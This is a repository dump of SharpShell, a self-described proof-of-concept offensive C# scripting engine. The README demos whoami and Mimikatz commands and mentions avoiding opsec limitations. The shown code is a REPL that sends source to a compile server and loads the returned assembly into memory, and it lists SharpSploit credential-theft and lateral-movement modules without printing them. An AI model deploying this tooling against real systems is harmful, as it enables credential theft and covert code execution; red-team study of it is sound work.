├── .gitignore ├── LICENSE ├── README.md ├── SharpShell.API.SharpShell ├── Compiler.cs ├── Properties │ └── AssemblyInfo.cs ├── SharpShell.API.SharpShell.csproj └── SharpShell.cs ├── SharpShell.API ├── Controllers │ └── SharpShellController.cs ├── Data │ ├── References │ │ ├── net35 │ │ │ ├── System.Core.dll │ │ │ ├── System.DirectoryServices.dll │ │ │ ├── System.IdentityModel.dll │ │ │ ├── System.Management.Automation.dll │ │ │ ├── System.Management.dll │ │ │ ├── System.dll │ │ │ └── mscorlib.dll │ │ ├── net40 │ │ │ ├── System.Core.dll │ │ │ ├── System.DirectoryServices.dll │ │ │ ├── System.IdentityModel.dll │ │ │ ├── System.Management.Automation.dll │ │ │ ├── System.Management.dll │ │ │ ├── System.dll │ │ │ └── mscorlib.dll │ │ └── references.yml │ ├── Resources │ │ ├── powerkatz_x64.dll │ │ ├── powerkatz_x64.dll.comp │ │ ├── powerkatz_x86.dll │ │ ├── powerkatz_x86.dll.comp │ │ └── resources.yml │ └── Source │ │ └── SharpSploit │ │ ├── Credentials │ │ ├── Mimikatz.cs │ │ └── Tokens.cs │ │ ├── Enumeration │ │ ├── Domain.cs │ │ ├── Host.cs │ │ └── Network.cs │ │ ├── Execution │ │ ├── Assembly.cs │ │ ├── PE.cs │ │ ├── Shell.cs │ │ ├── ShellCode.cs │ │ └── Win32.cs │ │ ├── Generic │ │ └── Generic.cs │ │ ├── LateralMovement │ │ ├── DCOM.cs │ │ └── WMI.cs │ │ └── Misc │ │ ├── CountdownEvent.cs │ │ └── Utilities.cs ├── Models │ ├── Common.cs │ ├── Compiler.cs │ └── SharpShellContext.cs ├── Properties │ └── launchSettings.json ├── SharpShell.API.csproj ├── SharpShellAPI.cs ├── Startup.cs ├── appsettings.Development.json └── appsettings.json ├── SharpShell.sln └── SharpShell ├── App.config ├── Common.cs ├── Compiler.cs ├── Data ├── References │ ├── net35 │ │ ├── System.Core.dll │ │ ├── System.DirectoryServices.dll │ │ ├── System.IdentityModel.dll │ │ ├── System.Management.Automation.dll │ │ ├── System.Management.dll │ │ ├── System.dll │ │ └── mscorlib.dll │ ├── net40 │ │ ├── System.Core.dll │ │ ├── System.DirectoryServices.dll │ │ ├── System.IdentityModel.dll │ │ ├── System.Management.Automation.dll │ │ ├── System.Management.dll │ │ ├── System.dll │ │ └── mscorlib.dll │ └── references.yml ├── Resources │ ├── powerkatz_x64.dll │ ├── powerkatz_x64.dll.comp │ ├── powerkatz_x86.dll │ ├── powerkatz_x86.dll.comp │ └── resources.yml └── Source │ └── SharpSploit │ ├── Credentials │ ├── Mimikatz.cs │ └── Tokens.cs │ ├── Enumeration │ ├── Domain.cs │ ├── Host.cs │ └── Network.cs │ ├── Execution │ ├── Assembly.cs │ ├── PE.cs │ ├── Shell.cs │ ├── ShellCode.cs │ └── Win32.cs │ ├── Generic │ └── Generic.cs │ ├── LateralMovement │ ├── DCOM.cs │ └── WMI.cs │ └── Misc │ ├── CountdownEvent.cs │ └── Utilities.cs ├── Properties └── AssemblyInfo.cs ├── SharpShell.cs ├── SharpShell.csproj └── packages.config /.gitignore: -------------------------------------------------------------------------------- 1 | ## Ignore Visual Studio temporary files, build results, and 2 | ## files generated by popular Visual Studio add-ons. 3 | 4 | # User-specific files 5 | *.suo 6 | *.user 7 | *.userosscache 8 | *.sln.docstates 9 | 10 | # User-specific files (MonoDevelop/Xamarin Studio) 11 | *.userprefs 12 | 13 | # Build results 14 | [Dd]ebug/ 15 | [Dd]ebugPublic/ 16 | [Rr]elease/ 17 | [Rr]eleases/ 18 | x64/ 19 | x86/ 20 | bld/ 21 | [Bb]in/ 22 | [Oo]bj/ 23 | [Ll]og/ 24 | 25 | # Visual Studio 2015 cache/options directory 26 | .vs/ 27 | # Uncomment if you have tasks that create the project's static files in wwwroot 28 | #wwwroot/ 29 | 30 | # MSTest test Results 31 | [Tt]est[Rr]esult*/ 32 | [Bb]uild[Ll]og.* 33 | 34 | # NUNIT 35 | *.VisualState.xml 36 | TestResult.xml 37 | 38 | # Build Results of an ATL Project 39 | [Dd]ebugPS/ 40 | [Rr]eleasePS/ 41 | dlldata.c 42 | 43 | # DNX 44 | project.lock.json 45 | project.fragment.lock.json 46 | artifacts/ 47 | 48 | *_i.c 49 | *_p.c 50 | *_i.h 51 | *.ilk 52 | *.meta 53 | *.obj 54 | *.pch 55 | *.pdb 56 | *.pgc 57 | *.pgd 58 | *.rsp 59 | *.sbr 60 | *.tlb 61 | *.tli 62 | *.tlh 63 | *.tmp 64 | *.tmp_proj 65 | *.log 66 | *.vspscc 67 | *.vssscc 68 | .builds 69 | *.pidb 70 | *.svclog 71 | *.scc 72 | 73 | # Chutzpah Test files 74 | _Chutzpah* 75 | 76 | # Visual C++ cache files 77 | ipch/ 78 | *.aps 79 | *.ncb 80 | *.opendb 81 | *.opensdf 82 | *.sdf 83 | *.cachefile 84 | *.VC.db 85 | *.VC.VC.opendb 86 | 87 | # Visual Studio profiler 88 | *.psess 89 | *.vsp 90 | *.vspx 91 | *.sap 92 | 93 | # TFS 2012 Local Workspace 94 | $tf/ 95 | 96 | # Guidance Automation Toolkit 97 | *.gpState 98 | 99 | # ReSharper is a .NET coding add-in 100 | _ReSharper*/ 101 | *.[Rr]e[Ss]harper 102 | *.DotSettings.user 103 | 104 | # JustCode is a .NET coding add-in 105 | .JustCode 106 | 107 | # TeamCity is a build add-in 108 | _TeamCity* 109 | 110 | # DotCover is a Code Coverage Tool 111 | *.dotCover 112 | 113 | # NCrunch 114 | _NCrunch_* 115 | .*crunch*.local.xml 116 | nCrunchTemp_* 117 | 118 | # MightyMoose 119 | *.mm.* 120 | AutoTest.Net/ 121 | 122 | # Web workbench (sass) 123 | .sass-cache/ 124 | 125 | # Installshield output folder 126 | [Ee]xpress/ 127 | 128 | # DocProject is a documentation generator add-in 129 | DocProject/buildhelp/ 130 | DocProject/Help/*.HxT 131 | DocProject/Help/*.HxC 132 | DocProject/Help/*.hhc 133 | DocProject/Help/*.hhk 134 | DocProject/Help/*.hhp 135 | DocProject/Help/Html2 136 | DocProject/Help/html 137 | 138 | # Click-Once directory 139 | publish/ 140 | 141 | # Publish Web Output 142 | *.[Pp]ublish.xml 143 | *.azurePubxml 144 | # TODO: Comment the next line if you want to checkin your web deploy settings 145 | # but database connection strings (with potential passwords) will be unencrypted 146 | #*.pubxml 147 | *.publishproj 148 | 149 | # Microsoft Azure Web App publish settings. Comment the next line if you want to 150 | # checkin your Azure Web App publish settings, but sensitive information contained 151 | # in these scripts will be unencrypted 152 | PublishScripts/ 153 | 154 | # NuGet Packages 155 | *.nupkg 156 | # The packages folder can be ignored because of Package Restore 157 | **/packages/* 158 | # except build/, which is used as an MSBuild target. 159 | !**/packages/build/ 160 | # Uncomment if necessary however generally it will be regenerated when needed 161 | #!**/packages/repositories.config 162 | # NuGet v3's project.json files produces more ignoreable files 163 | *.nuget.props 164 | *.nuget.targets 165 | 166 | # Microsoft Azure Build Output 167 | csx/ 168 | *.build.csdef 169 | 170 | # Microsoft Azure Emulator 171 | ecf/ 172 | rcf/ 173 | 174 | # Windows Store app package directories and files 175 | AppPackages/ 176 | BundleArtifacts/ 177 | Package.StoreAssociation.xml 178 | _pkginfo.txt 179 | 180 | # Visual Studio cache files 181 | # files ending in .cache can be ignored 182 | *.[Cc]ache 183 | # but keep track of directories ending in .cache 184 | !*.[Cc]ache/ 185 | 186 | # Others 187 | ClientBin/ 188 | ~$* 189 | *~ 190 | *.dbmdl 191 | *.dbproj.schemaview 192 | *.jfm 193 | *.pfx 194 | *.publishsettings 195 | node_modules/ 196 | orleans.codegen.cs 197 | 198 | # Since there are multiple workflows, uncomment next line to ignore bower_components 199 | # (https://github.com/github/gitignore/pull/1529#issuecomment-104372622) 200 | #bower_components/ 201 | 202 | # RIA/Silverlight projects 203 | Generated_Code/ 204 | 205 | # Backup & report files from converting an old project file 206 | # to a newer Visual Studio version. Backup files are not needed, 207 | # because we have git ;-) 208 | _UpgradeReport_Files/ 209 | Backup*/ 210 | UpgradeLog*.XML 211 | UpgradeLog*.htm 212 | 213 | # SQL Server files 214 | *.mdf 215 | *.ldf 216 | 217 | # Business Intelligence projects 218 | *.rdl.data 219 | *.bim.layout 220 | *.bim_*.settings 221 | 222 | # Microsoft Fakes 223 | FakesAssemblies/ 224 | 225 | # GhostDoc plugin setting file 226 | *.GhostDoc.xml 227 | 228 | # Node.js Tools for Visual Studio 229 | .ntvs_analysis.dat 230 | 231 | # Visual Studio 6 build log 232 | *.plg 233 | 234 | # Visual Studio 6 workspace options file 235 | *.opt 236 | 237 | # Visual Studio LightSwitch build output 238 | **/*.HTMLClient/GeneratedArtifacts 239 | **/*.DesktopClient/GeneratedArtifacts 240 | **/*.DesktopClient/ModelManifest.xml 241 | **/*.Server/GeneratedArtifacts 242 | **/*.Server/ModelManifest.xml 243 | _Pvt_Extensions 244 | 245 | # Paket dependency manager 246 | .paket/paket.exe 247 | paket-files/ 248 | 249 | # FAKE - F# Make 250 | .fake/ 251 | 252 | # JetBrains Rider 253 | .idea/ 254 | *.sln.iml 255 | 256 | # CodeRush 257 | .cr/ 258 | 259 | # Python Tools for Visual Studio (PTVS) 260 | __pycache__/ 261 | *.pyc -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | Copyright 2018, Ryan Cobb (@cobbr_io) 2 | 3 | Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met: 4 | 5 | 1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer. 6 | 7 | 2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution. 8 | 9 | 3. Neither the name of the copyright holder nor the names of its contributors may be used to endorse or promote products derived from this software without specific prior written permission. 10 | 11 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 12 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # SharpShell 2 | 3 | [SharpShell](https://github.com/cobbr/SharpShell) is a proof-of-concept offensive C# scripting engine that utilizes the [Rosyln](https://github.com/dotnet/roslyn) C# compiler to quickly cross-compile .NET Framework console applications or libraries. 4 | 5 | SharpShell is broken up into three distinct C# projects: 6 | 7 | * **SharpShell** - `SharpShell` is the most straightforward of the three projects. It acts as an interactive shell and scripting engine for C# code compiled against chosen source code, references, and resources. The main caveat with `SharpShell` is that it depends upon .NET Framework 4.6 and 3.5/4.0 being installed on the system. This is because `SharpShell` depends upon the Roslyn API, which requires 4.6, and executes an assembly in memory cross-compiled for you choice of versions 3.5 or 4.0. 8 | * **SharpShell.API** - `SharpShell.API` and `SharpShell.API.SharpShell` are two projects meant to be used in tandem. To avoid the opsec limitations and .NET Framework 4.6 requirements of `SharpShell`, `SharpShell.API` acts as a web-server that handles the compilation for `SharpShell.API.SharpShell`. `SharpShell.API` is a ASP.NET Core 2.1 application and is cross-platform. 9 | * **SharpShell.API.SharpShell** - `SharpShell.API.SharpShell` provides the same interface as `SharpShell`, but doesn't have the .NET Framework 4.6 requirement. `SharpShell.API.SharpShell` runs on .NET Framework 3.5, but also requires network communication with a `SharpShell.API` server for handling compilation of assemblies. 10 | 11 | ### Intro 12 | 13 | You'll find additional details about the SharpShell project in this [introductory blog post](https://cobbr.io/SharpShell.html). 14 | 15 | ### Quick Start 16 | 17 | Start up the standalone `SharpShell` and execute C# one-liners that compile against [SharpSploit](https://github.com/cobbr/SharpSploit): 18 | 19 | ``` 20 | PS C:\Users\cobbr\Demos\SharpShell\SharpShell\bin\Release> .\SharpShell.exe 21 | SharpShell > Shell.ShellExecute("whoami"); 22 | desktop-f9dq76g\cobbr 23 | 24 | SharpShell > using (Tokens t = new Tokens()) { \ 25 | >>> return t.WhoAmI(); \ 26 | >>> } 27 | DESKTOP-F9DQ76G\cobbr 28 | SharpShell > Mimikatz.Command("coffee"); 29 | 30 | .#####. mimikatz 2.1.1 (x86) built on Oct 22 2018 16:27:15 31 | .## ^ ##. "A La Vie, A L'Amour" - (oe.eo) ** Kitten Edition ** 32 | ## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com ) 33 | ## \ / ## > http://blog.gentilkiwi.com/mimikatz 34 | '## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com ) 35 | '#####' > http://pingcastle.com / http://mysmartlogon.com ***/ 36 | 37 | mimikatz(powershell) # coffee 38 | 39 | ( ( 40 | ) ) 41 | .______. 42 | | |] 43 | \ / 44 | `----' 45 | 46 | SharpShell > 47 | ``` 48 | -------------------------------------------------------------------------------- /SharpShell.API.SharpShell/Compiler.cs: -------------------------------------------------------------------------------- 1 | // Author: Ryan Cobb (@cobbr_io) 2 | // Project: SharpShell (https://github.com/cobbr/SharpShell) 3 | // License: BSD 3-Clause 4 | 5 | using System; 6 | using System.IO; 7 | using System.Net; 8 | using System.Text; 9 | using System.IO.Compression; 10 | using System.Collections.Generic; 11 | 12 | namespace SharpShell.API.SharpShell 13 | { 14 | public class APICompiler 15 | { 16 | public enum OutputKind 17 | { 18 | ConsoleApplication = 0, 19 | WindowsApplication = 1, 20 | DynamicallyLinkedLibrary = 2, 21 | NetModule = 3, 22 | WindowsRuntimeMetaData = 4, 23 | WindowsRuntimeApplication = 5 24 | } 25 | 26 | public enum DotNetVersion 27 | { 28 | Net35, 29 | Net40 30 | } 31 | 32 | public enum Platform 33 | { 34 | AnyCpu = 0, 35 | X86 = 1, 36 | X64 =2 37 | } 38 | 39 | public class EmbeddedResource 40 | { 41 | public string Name { get; set; } 42 | public string File { get; set; } 43 | public Platform Platform { get; set; } = Platform.AnyCpu; 44 | public bool Enabled { get; set; } = false; 45 | } 46 | 47 | public class Reference 48 | { 49 | public string File { get; set; } 50 | public DotNetVersion Framework { get; set; } = DotNetVersion.Net35; 51 | public bool Enabled { get; set; } = false; 52 | } 53 | 54 | public class CompilationRequest 55 | { 56 | public string Source { get; set; } = null; 57 | public string SourceDirectory { get; set; } = null; 58 | public string ResourceDirectory { get; set; } = null; 59 | public string ReferenceDirectory { get; set; } = null; 60 | 61 | public DotNetVersion TargetDotNetVersion { get; set; } = DotNetVersion.Net35; 62 | public OutputKind OutputKind { get; set; } = OutputKind.DynamicallyLinkedLibrary; 63 | public Platform Platform { get; set; } = Platform.AnyCpu; 64 | public bool Optimize = true; 65 | 66 | public string AssemblyName { get; set; } = null; 67 | public List References { get; set; } = new List(); 68 | public List EmbeddedResources { get; set; } = new List(); 69 | } 70 | 71 | 72 | private string SharpShellURI { get; set; } = ""; 73 | private WebClient client { get; set; } = new WebClient(); 74 | 75 | public APICompiler(string SharpShellURI = "http://localhost:5000/api/SharpShell/compile") 76 | { 77 | this.SharpShellURI = SharpShellURI; 78 | } 79 | 80 | public byte[] Compile(CompilationRequest compilationRequest) 81 | { 82 | this.SetHeaders(); 83 | try 84 | { 85 | return Convert.FromBase64String(client.UploadString(this.SharpShellURI, ToJson(compilationRequest))); 86 | } 87 | catch (WebException e) 88 | { 89 | using (var reader = new StreamReader(e.Response.GetResponseStream())) 90 | { 91 | throw new CompilationException("CompilationException: " + reader.ReadToEnd()); 92 | } 93 | } 94 | 95 | } 96 | 97 | public void SetHeaders() 98 | { 99 | this.client.Proxy = WebRequest.DefaultWebProxy; 100 | this.client.Proxy.Credentials = CredentialCache.DefaultNetworkCredentials; 101 | this.client.Headers.Set("Content-Type", "application/json"); 102 | } 103 | 104 | private static string ToJson(CompilationRequest request) 105 | { 106 | string RequestFormat = 107 | @"{{ 108 | ""source"": ""{0}"", 109 | ""frameworkVersion"": {1}, 110 | ""outputKind"": {2} 111 | }}"; 112 | 113 | return String.Format(RequestFormat, JavaScriptStringEncode(request.Source), request.TargetDotNetVersion.ToString("D"), request.OutputKind.ToString("D")); 114 | } 115 | 116 | // Adapted from https://github.com/mono/mono/blob/master/mcs/class/System.Web/System.Web/HttpUtility.cs 117 | public static string JavaScriptStringEncode(string value) 118 | { 119 | if (String.IsNullOrEmpty(value)) { return String.Empty; } 120 | int len = value.Length; 121 | bool needEncode = false; 122 | char c; 123 | for (int i = 0; i < len; i++) 124 | { 125 | c = value[i]; 126 | if (c >= 0 && c <= 31 || c == 34 || c == 39 || c == 60 || c == 62 || c == 92) 127 | { 128 | needEncode = true; 129 | break; 130 | } 131 | } 132 | 133 | if (!needEncode) { return value; } 134 | 135 | var sb = new StringBuilder(); 136 | for (int i = 0; i < len; i++) 137 | { 138 | c = value[i]; 139 | if (c >= 0 && c <= 7 || c == 11 || c >= 14 && c <= 31 || c == 39 || c == 60 || c == 62) 140 | sb.AppendFormat("\\u{0:x4}", (int)c); 141 | else switch ((int)c) 142 | { 143 | case 8: 144 | sb.Append("\\b"); 145 | break; 146 | case 9: 147 | sb.Append("\\t"); 148 | break; 149 | case 10: 150 | sb.Append("\\n"); 151 | break; 152 | case 12: 153 | sb.Append("\\f"); 154 | break; 155 | case 13: 156 | sb.Append("\\r"); 157 | break; 158 | case 34: 159 | sb.Append("\\\""); 160 | break; 161 | case 92: 162 | sb.Append("\\\\"); 163 | break; 164 | default: 165 | sb.Append(c); 166 | break; 167 | } 168 | } 169 | return sb.ToString(); 170 | } 171 | 172 | private static byte[] Compress(byte[] bytes) 173 | { 174 | byte[] compressedILBytes; 175 | using (MemoryStream memoryStream = new MemoryStream()) 176 | { 177 | using (DeflateStream deflateStream = new DeflateStream(memoryStream, CompressionMode.Compress)) 178 | { 179 | deflateStream.Write(bytes, 0, bytes.Length); 180 | } 181 | compressedILBytes = memoryStream.ToArray(); 182 | } 183 | return compressedILBytes; 184 | } 185 | } 186 | 187 | public class CompilationException : Exception 188 | { 189 | public CompilationException() 190 | { 191 | 192 | } 193 | 194 | public CompilationException(string message) : base(message) 195 | { 196 | 197 | } 198 | 199 | public CompilationException(string message, Exception inner) : base(message, inner) 200 | { 201 | 202 | } 203 | } 204 | } 205 | -------------------------------------------------------------------------------- /SharpShell.API.SharpShell/Properties/AssemblyInfo.cs: -------------------------------------------------------------------------------- 1 | using System.Reflection; 2 | using System.Runtime.CompilerServices; 3 | using System.Runtime.InteropServices; 4 | 5 | // General Information about an assembly is controlled through the following 6 | // set of attributes. Change these attribute values to modify the information 7 | // associated with an assembly. 8 | [assembly: AssemblyTitle("SharpSploit.API.SharpShell")] 9 | [assembly: AssemblyDescription("")] 10 | [assembly: AssemblyConfiguration("")] 11 | [assembly: AssemblyCompany("")] 12 | [assembly: AssemblyProduct("SharpSploit.API.SharpShell")] 13 | [assembly: AssemblyCopyright("Copyright © 2018")] 14 | [assembly: AssemblyTrademark("")] 15 | [assembly: AssemblyCulture("")] 16 | 17 | // Setting ComVisible to false makes the types in this assembly not visible 18 | // to COM components. If you need to access a type in this assembly from 19 | // COM, set the ComVisible attribute to true on that type. 20 | [assembly: ComVisible(false)] 21 | 22 | // The following GUID is for the ID of the typelib if this project is exposed to COM 23 | [assembly: Guid("b84548dc-d926-4b39-8293-fa0bdef34d49")] 24 | 25 | // Version information for an assembly consists of the following four values: 26 | // 27 | // Major Version 28 | // Minor Version 29 | // Build Number 30 | // Revision 31 | // 32 | // You can specify all the values or you can default the Build and Revision Numbers 33 | // by using the '*' as shown below: 34 | // [assembly: AssemblyVersion("1.0.*")] 35 | [assembly: AssemblyVersion("1.0.0.0")] 36 | [assembly: AssemblyFileVersion("1.0.0.0")] 37 | -------------------------------------------------------------------------------- /SharpShell.API.SharpShell/SharpShell.API.SharpShell.csproj: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | Debug 6 | AnyCPU 7 | {B84548DC-D926-4B39-8293-FA0BDEF34D49} 8 | Exe 9 | SharpShell.API.SharpShell 10 | SharpShell.API.SharpShell 11 | v3.5 12 | 512 13 | true 14 | 15 | 16 | AnyCPU 17 | true 18 | full 19 | false 20 | bin\Debug\ 21 | DEBUG;TRACE 22 | prompt 23 | 4 24 | 25 | 26 | AnyCPU 27 | pdbonly 28 | true 29 | bin\Release\ 30 | TRACE 31 | prompt 32 | 4 33 | 34 | 35 | 36 | 37 | 38 | 39 | 40 | 41 | 42 | 43 | 44 | 45 | 46 | 47 | 48 | -------------------------------------------------------------------------------- /SharpShell.API.SharpShell/SharpShell.cs: -------------------------------------------------------------------------------- 1 | // Author: Ryan Cobb (@cobbr_io) 2 | // Project: SharpShell (https://github.com/cobbr/SharpShell) 3 | // License: BSD 3-Clause 4 | 5 | using System; 6 | using System.Linq; 7 | using System.Reflection; 8 | using System.Collections.Generic; 9 | 10 | namespace SharpShell.API.SharpShell 11 | { 12 | class SharpShell 13 | { 14 | public static string WrapperFunctionFormat = 15 | @"using System; 16 | using System.IO; 17 | using System.Linq; 18 | using System.Text; 19 | using System.Security; 20 | using System.Security.Principal; 21 | using System.Collections.Generic; 22 | {0} 23 | 24 | using SharpSploit.Credentials; 25 | using SharpSploit.Enumeration; 26 | using SharpSploit.Execution; 27 | using SharpSploit.Generic; 28 | using SharpSploit.Misc; 29 | 30 | public static class {1} 31 | {{ 32 | public static object Execute() 33 | {{ 34 | {2} 35 | }} 36 | }} 37 | "; 38 | 39 | static void Main(string[] args) 40 | { 41 | bool printPrompt = true; 42 | List UsingImports = new List(); 43 | List lines = new List(); 44 | APICompiler compiler = new APICompiler(args.Length > 0 ? args[0] : "http://localhost:5000/api/SharpShell/compile"); 45 | while (true) 46 | { 47 | // Display Prompt 48 | if (printPrompt) 49 | { 50 | Console.Write("SharpShell > "); 51 | } 52 | else 53 | { 54 | Console.Write(">>> "); 55 | } 56 | 57 | // Read Input 58 | string line = Console.ReadLine(); 59 | 60 | // SharpShell Special Commands 61 | if (line.Trim().ToLower() == "exit" || line.Trim().ToLower() == "quit") 62 | { 63 | return; 64 | } 65 | else if (line.Trim() == "") 66 | { 67 | continue; 68 | } 69 | else if (line.Trim().EndsWith("\\")) 70 | { 71 | printPrompt = false; 72 | lines.Add(line.TrimEnd('\\')); 73 | continue; 74 | } 75 | else if (line.Trim().StartsWith("using ") && line.Trim().Split(' ').Length == 2 && line.Trim().EndsWith(";")) 76 | { 77 | Console.WriteLine("Import:\"" + line.Trim() + "\" now being used."); 78 | UsingImports.Add(line.Trim()); 79 | continue; 80 | } 81 | 82 | try 83 | { 84 | // Concatenation 85 | printPrompt = true; 86 | string source = String.Join(Environment.NewLine, lines.ToArray()); 87 | lines.Clear(); 88 | source = source + Environment.NewLine + line; 89 | if (!source.Contains("return ")) 90 | { 91 | source = "return " + source; 92 | } 93 | 94 | // Compilation 95 | string ClassName = RandomString(); 96 | byte[] assemblyBytes = compiler.Compile(new APICompiler.CompilationRequest 97 | { 98 | Source = String.Format(WrapperFunctionFormat, String.Join(Environment.NewLine, UsingImports.ToArray()), ClassName, source), 99 | AssemblyName = "SharpShell", 100 | Optimize = true, 101 | TargetDotNetVersion = APICompiler.DotNetVersion.Net35, 102 | OutputKind = APICompiler.OutputKind.DynamicallyLinkedLibrary, 103 | Platform = APICompiler.Platform.AnyCpu 104 | }); 105 | 106 | // Execution 107 | Assembly assembly = Assembly.Load(assemblyBytes); 108 | object result = assembly.GetType(ClassName).GetMethod("Execute").Invoke(null, null); 109 | Console.WriteLine(result.ToString()); 110 | } 111 | catch (CompilationException e) 112 | { 113 | Console.Error.WriteLine(e.Message); 114 | } 115 | catch (Exception e) 116 | { 117 | Console.Error.WriteLine("RuntimeException: " + e.Message + e.StackTrace); 118 | } 119 | } 120 | } 121 | 122 | private static Random random = new Random(); 123 | private static string RandomString() 124 | { 125 | const string alphachars = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"; 126 | const string chars = "ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"; 127 | return alphachars[random.Next(alphachars.Length)] + new string(Enumerable.Repeat(chars, random.Next(10, 30)).Select(s => s[random.Next(s.Length)]).ToArray()); 128 | } 129 | } 130 | } 131 | -------------------------------------------------------------------------------- /SharpShell.API/Controllers/SharpShellController.cs: -------------------------------------------------------------------------------- 1 | // Author: Ryan Cobb (@cobbr_io) 2 | // Project: SharpShell (https://github.com/cobbr/SharpShell) 3 | // License: BSD 3-Clause 4 | 5 | using System; 6 | using System.IO; 7 | using System.Linq; 8 | using System.Collections.Generic; 9 | using Microsoft.AspNetCore.Mvc; 10 | 11 | using YamlDotNet.Serialization; 12 | using SharpShell.API.Models; 13 | 14 | namespace SharpShell.API.Controllers 15 | { 16 | [Route("api/[controller]")] 17 | [ApiController] 18 | public class SharpShellController : ControllerBase 19 | { 20 | private readonly SharpShellContext _context; 21 | 22 | public SharpShellController(SharpShellContext context) 23 | { 24 | this._context = context; 25 | } 26 | 27 | // POST api/sharpshell/compile 28 | [HttpPost("compile")] 29 | public ActionResult PostCompile([FromBody] Compiler.CompilationRequest request = default(Compiler.CompilationRequest)) 30 | { 31 | request.SourceDirectory = Common.SharpShellSourceDirectory; 32 | request.ResourceDirectory = Common.SharpShellResourcesDirectory; 33 | request.ReferenceDirectory = Common.SharpShellReferencesDirectory; 34 | using (TextReader reader = System.IO.File.OpenText(Common.SharpShellReferencesConfig)) 35 | { 36 | var deserializer = new DeserializerBuilder().Build(); 37 | request.References = deserializer.Deserialize>(reader) 38 | .Where(R => R.Framework == request.TargetDotNetVersion) 39 | .Where(R => R.Enabled) 40 | .ToList(); 41 | } 42 | using (TextReader reader = System.IO.File.OpenText(Common.SharpShellResourcesConfig)) 43 | { 44 | var deserializer = new DeserializerBuilder().Build(); 45 | request.EmbeddedResources = deserializer.Deserialize>(reader) 46 | .Where(ER => ER.Enabled) 47 | .ToList(); 48 | } 49 | try 50 | { 51 | return Convert.ToBase64String(Compiler.Compile(request)); 52 | } 53 | catch (CompilerException e) 54 | { 55 | return BadRequest(e.Message); 56 | } 57 | } 58 | } 59 | } 60 | -------------------------------------------------------------------------------- /SharpShell.API/Data/References/net35/System.Core.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cobbr/SharpShell/683a05a9df13eccd627a41d60859836bc17e8d44/SharpShell.API/Data/References/net35/System.Core.dll -------------------------------------------------------------------------------- /SharpShell.API/Data/References/net35/System.DirectoryServices.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cobbr/SharpShell/683a05a9df13eccd627a41d60859836bc17e8d44/SharpShell.API/Data/References/net35/System.DirectoryServices.dll -------------------------------------------------------------------------------- /SharpShell.API/Data/References/net35/System.IdentityModel.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cobbr/SharpShell/683a05a9df13eccd627a41d60859836bc17e8d44/SharpShell.API/Data/References/net35/System.IdentityModel.dll -------------------------------------------------------------------------------- /SharpShell.API/Data/References/net35/System.Management.Automation.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cobbr/SharpShell/683a05a9df13eccd627a41d60859836bc17e8d44/SharpShell.API/Data/References/net35/System.Management.Automation.dll -------------------------------------------------------------------------------- /SharpShell.API/Data/References/net35/System.Management.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cobbr/SharpShell/683a05a9df13eccd627a41d60859836bc17e8d44/SharpShell.API/Data/References/net35/System.Management.dll -------------------------------------------------------------------------------- /SharpShell.API/Data/References/net35/System.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cobbr/SharpShell/683a05a9df13eccd627a41d60859836bc17e8d44/SharpShell.API/Data/References/net35/System.dll -------------------------------------------------------------------------------- /SharpShell.API/Data/References/net35/mscorlib.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cobbr/SharpShell/683a05a9df13eccd627a41d60859836bc17e8d44/SharpShell.API/Data/References/net35/mscorlib.dll -------------------------------------------------------------------------------- /SharpShell.API/Data/References/net40/System.Core.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cobbr/SharpShell/683a05a9df13eccd627a41d60859836bc17e8d44/SharpShell.API/Data/References/net40/System.Core.dll -------------------------------------------------------------------------------- /SharpShell.API/Data/References/net40/System.DirectoryServices.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cobbr/SharpShell/683a05a9df13eccd627a41d60859836bc17e8d44/SharpShell.API/Data/References/net40/System.DirectoryServices.dll -------------------------------------------------------------------------------- /SharpShell.API/Data/References/net40/System.IdentityModel.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cobbr/SharpShell/683a05a9df13eccd627a41d60859836bc17e8d44/SharpShell.API/Data/References/net40/System.IdentityModel.dll -------------------------------------------------------------------------------- /SharpShell.API/Data/References/net40/System.Management.Automation.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cobbr/SharpShell/683a05a9df13eccd627a41d60859836bc17e8d44/SharpShell.API/Data/References/net40/System.Management.Automation.dll -------------------------------------------------------------------------------- /SharpShell.API/Data/References/net40/System.Management.dll: -------------------------------------------------------------------------------- 